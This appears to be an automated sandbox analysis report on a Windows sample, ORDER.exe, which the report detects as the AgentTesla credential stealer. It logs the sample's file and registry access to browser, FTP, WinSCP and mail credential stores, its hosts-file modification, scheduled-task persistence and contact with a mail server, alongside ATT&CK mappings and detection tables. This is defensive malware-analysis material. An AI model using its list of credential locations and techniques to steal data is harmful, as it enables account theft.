                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Users\user\Desktop\ORDER.exe VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_0636516C GetUserNameW,
                  Source: C:\Users\user\Desktop\ORDER.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings:

                  barindex
                  Modifies the hosts fileShow sources
                  Source: C:\Users\user\Desktop\ORDER.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000016.00000002.501684497.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.336092801.0000000003C2D000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.256224366.00000000042DD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.362741095.0000000003C4D000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.362091691.0000000002CA1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.360531497.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.501685208.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6764, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6928, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ORDER.exe PID: 4396, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ORDER.exe PID: 4356, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 4416, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6572, type: MEMORY
                  Source: Yara matchFile source: 3.2.ORDER.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\ORDER.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Users\user\Desktop\ORDER.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\ORDER.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Tries to harvest and steal ftp login credentialsShow sources
                  Source: C:\Users\user\Desktop\ORDER.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Users\user\Desktop\ORDER.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                  Tries to steal Mail credentials (via file access)Show sources
                  Source: C:\Users\user\Desktop\ORDER.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\ORDER.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\ORDER.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\user\Desktop\ORDER.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: Yara matchFile source: 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.362091691.0000000002CA1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.506730748.0000000003106000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6764, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ORDER.exe PID: 4396, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 4416, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 00000016.00000002.501684497.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000D.00000002.336092801.0000000003C2D000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.506315156.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.256224366.00000000042DD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.362741095.0000000003C4D000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.506561443.00000000030B1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.362091691.0000000002CA1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.360531497.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.501685208.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6764, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6928, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ORDER.exe PID: 4396, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ORDER.exe PID: 4356, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 4416, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: kprUEGC.exe PID: 6572, type: MEMORY
                  Source: Yara matchFile source: 3.2.ORDER.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.kprUEGC.exe.400000.0.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation211Scheduled Task/Job1Process Injection112File and Directory Permissions Modification1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/Job1Registry Run Keys / Startup Folder1Scheduled Task/Job1Disable or Modify Tools1Input Capture1File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Obfuscated Files or Information3Credentials in Registry1System Information Discovery114SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSQuery Registry1Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSecurity Software Discovery331SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion14Cached Domain CredentialsVirtualization/Sandbox Evasion14VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 323803 Sample: ORDER.exe Startdate: 27/11/2020 Architecture: WINDOWS Score: 100 55 g.msn.com 2->55 65 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->65 67 Found malware configuration 2->67 69 Multi AV Scanner detection for dropped file 2->69 71 11 other signatures 2->71 8 ORDER.exe 6 2->8         started        12 kprUEGC.exe 5 2->12         started        14 kprUEGC.exe 2->14         started        signatures3 process4 file5 43 C:\Users\user\AppData\...\yqoevzHDNPFH.exe, PE32 8->43 dropped 45 C:\Users\user\AppData\Local\...\tmp8EFE.tmp, XML 8->45 dropped 47 C:\Users\user\AppData\Local\...\ORDER.exe.log, ASCII 8->47 dropped 73 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->73 75 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 8->75 77 Injects a PE file into a foreign processes 8->77 16 ORDER.exe 17 5 8->16         started        21 schtasks.exe 1 8->21         started        79 Multi AV Scanner detection for dropped file 12->79 81 Machine Learning detection for dropped file 12->81 23 schtasks.exe 1 12->23         started        25 kprUEGC.exe 2 12->25         started        27 kprUEGC.exe 14->27         started        29 schtasks.exe 14->29         started        signatures6 process7 dnsIp8 49 vasudeva.in 68.233.236.158, 49728, 587 HVC-ASUS United States 16->49 51 mail.vasudeva.in 16->51 53 3 other IPs or domains 16->53 37 C:\Users\user\AppData\Roaming\...\kprUEGC.exe, PE32 16->37 dropped 39 C:\Users\user\...\kprUEGC.exe:Zone.Identifier, ASCII 16->39 dropped 57 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->57 59 Tries to steal Mail credentials (via file access) 16->59 61 Tries to harvest and steal ftp login credentials 16->61 63 3 other signatures 16->63 31 conhost.exe 21->31         started        33 conhost.exe 23->33         started        41 C:\Windows\System32\drivers\etc\hosts, ASCII 27->41 dropped 35 conhost.exe 29->35         started        file9 signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  ORDER.exe70%VirustotalBrowse
                  ORDER.exe73%ReversingLabsByteCode-MSIL.Backdoor.Androm
                  ORDER.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\yqoevzHDNPFH.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\kprUEGC\kprUEGC.exe73%ReversingLabsByteCode-MSIL.Backdoor.Androm
                  C:\Users\user\AppData\Roaming\yqoevzHDNPFH.exe73%ReversingLabsByteCode-MSIL.Backdoor.Androm

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  3.2.ORDER.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                  17.2.kprUEGC.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                  22.2.kprUEGC.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://DynDns.comDynDNS0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                  http://RKhkfz.com0%Avira URL Cloudsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://www.tiro.com0%URL Reputationsafe
                  http://5WnFQTEnuc.com1-5-21-3853321935-2125563209-4053062332-1002_Classes0%Avira URL Cloudsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://www.fontbureau.coml10%Avira URL Cloudsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                  https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                  https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
